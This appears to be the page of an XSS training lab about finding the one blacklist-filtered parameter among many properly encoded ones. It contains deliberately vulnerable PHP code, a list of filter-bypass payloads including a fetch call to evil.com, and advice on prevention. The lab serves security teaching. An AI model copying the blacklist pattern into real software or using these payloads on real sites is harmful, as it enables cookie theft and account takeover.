Needle in a Haystack XSS Lab

Find the one vulnerable parameter hidden among 30+ secure parameters

Needle in a Haystack Challenge

Lab Overview

This lab demonstrates a real-world scenario where most parameters are properly secured, but one parameter uses blacklist filtering instead of proper encoding. With over 30 parameters using htmlspecialchars(), you need to find the single vulnerable parameter.

Mixed Security Implementation: 30+ parameters use htmlspecialchars() encoding (secure), but one parameter uses blacklist filtering (vulnerable).
Parameter Discovery Challenge: There are over 30 parameters to test. Use tools like Arjun to discover them all and find the vulnerable one!
# use arjun tool to find all parameters
Hint: You already found this vulnerable parameter in Lab No. 2. Look for patterns from previous challenges!
Parameter Security Levels:
Secure 30+ parameters - Use htmlspecialchars()
Vulnerable 1 parameter - Uses blacklist filtering
Realistic Scenario Mixed security implementations are common
Discovery Challenge Find the needle in the haystack
Sample Parameters (Partial List):
Parameter: fname
Secure - htmlspecialchars()
Parameter: lname
Secure - htmlspecialchars()
Parameter: q
Secure - htmlspecialchars()
Parameter: search
Secure - htmlspecialchars()
Parameter: keyword
Secure - htmlspecialchars()
Parameter: query
Secure - htmlspecialchars()
Parameter: page
Secure - htmlspecialchars()
Parameter: email
Secure - htmlspecialchars()
Parameter: username
Secure - htmlspecialchars()
Parameter: password
Secure - htmlspecialchars()
Parameter: ???
Vulnerable - Blacklist filtering
Parameter: ...
Secure - htmlspecialchars()
Secure Parameters (30+):
Input: <script>alert(1)</script>
Output: &lt;script&gt;alert(1)&lt;/script&gt;
Vulnerable Parameter (1):
Input: <script>alert(1)</script>
Output: <>alert(1)</>
One parameter among many uses blacklist filtering instead of proper encoding, creating a hidden vulnerability.
Overall Security Level: Mixed Security

Objective: Discover all parameters and find the single vulnerable one that uses blacklist filtering instead of proper encoding.

Backend Source Code 
// 30+ parameters use secure encoding
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["q"])){
    echo htmlspecialchars($_GET["q"], ENT_QUOTES);
}
// ... 30+ more parameters with htmlspecialchars()

// One parameter uses vulnerable blacklist filtering
elseif(isset($_GET["???"])){
    $arr = array('details','alert','confirm','prompt','eval',
                'ontoggle','onmousemove','onmouseover',
                'script','Script','sCript','scRipt','scrIpt',
                'scriPt','scripT','SCript','SCRipt','SCRIpt',
                'SCRIPt','SCRIPT','img','image','svg','onfocus');
    $re = str_replace($arr, '', $_GET['???']);
    echo $re;
}
Test Input Forms
Visible Parameters (HTML Encoded)
This parameter uses htmlspecialchars() encoding
This parameter uses htmlspecialchars() encoding
Hidden Parameters (Mixed Security)
Challenge: There are 30+ hidden parameters. Most are secure, but one uses blacklist filtering. Use parameter discovery tools!
Uses htmlspecialchars() encoding
Uses htmlspecialchars() encoding
Uses htmlspecialchars() encoding
Uses htmlspecialchars() encoding
Uses blacklist filtering - XSS possible!
XSS Bypass Techniques for the Vulnerable Parameter
String Concatenation Bypass:
  • <script>window['al'+'ert'](1)</script>
  • <script>this['al'+'ert'](1)</script>
  • <script>self['al'+'ert'](1)</script>
  • <script>top['al'+'ert'](1)</script>
Alternative Tags/Events:
  • <iframe src=javascript:alert(1)>
  • <body onload=window['al'+'ert'](1)>
  • <marquee onstart=alert(1)></marquee>
  • <object data=javascript:alert(1)>
Character Encoding Bypass:
  • <script>window['alert'](1)</script>
  • <script>window['\x61lert'](1)</script>
  • <script>window['\141lert'](1)</script>
  • <script>window[`al${''}ert`](1)</script>
Alternative Functions:
  • <script>print()</script>
  • <script>open()</script>
  • <script>console.log(1)</script>
  • <script>fetch('http://evil.com')</script>
Blacklist Filter Analysis:

The vulnerable parameter filters these keywords:

script alert confirm prompt eval ontoggle onmousemove onmouseover onfocus img image svg details

Plus multiple case variations of 'script'

Security Implications

Mixed security implementations demonstrate:

  • One vulnerable parameter can compromise an entire application
  • Security consistency is critical across all parameters
  • Parameter discovery is essential for comprehensive testing
  • Blacklist filtering provides false sense of security
  • Legacy code or new features may introduce vulnerabilities
  • Automated tools may miss single vulnerable parameters
Best Practices

For secure web applications:

  • Apply consistent security controls to ALL parameters
  • Use context-aware output encoding instead of blacklists
  • Implement strict Content Security Policy (CSP) headers
  • Test all parameters with comprehensive security testing
  • Use parameter discovery tools during security assessments
  • Implement security code reviews for all changes
  • Assume attackers will find and exploit any inconsistency
Real-World Security Implications
Common Mixed Security Scenarios:
  • Legacy code: Older parameters may have different security
  • Third-party integrations: External code may use different approaches
  • Developer inconsistency: Different teams may implement security differently
  • Feature additions: New features may not follow established patterns
Impact of Single Parameter Vulnerability:
  • Complete application compromise through one entry point
  • Session hijacking through cookie theft
  • Account takeover attacks
  • Data exfiltration and privacy breaches
  • Reputation damage despite overall good security
Comprehensive Prevention Strategies:
  • Security consistency: Apply same security controls to all parameters
  • Context-aware encoding: Use proper encoding for each output context
  • Comprehensive testing: Test all parameters with various payloads
  • Parameter discovery: Use tools to find all parameters during testing
  • Security headers: Implement CSP, X-XSS-Protection, etc.
  • Code review: Review all code changes for security consistency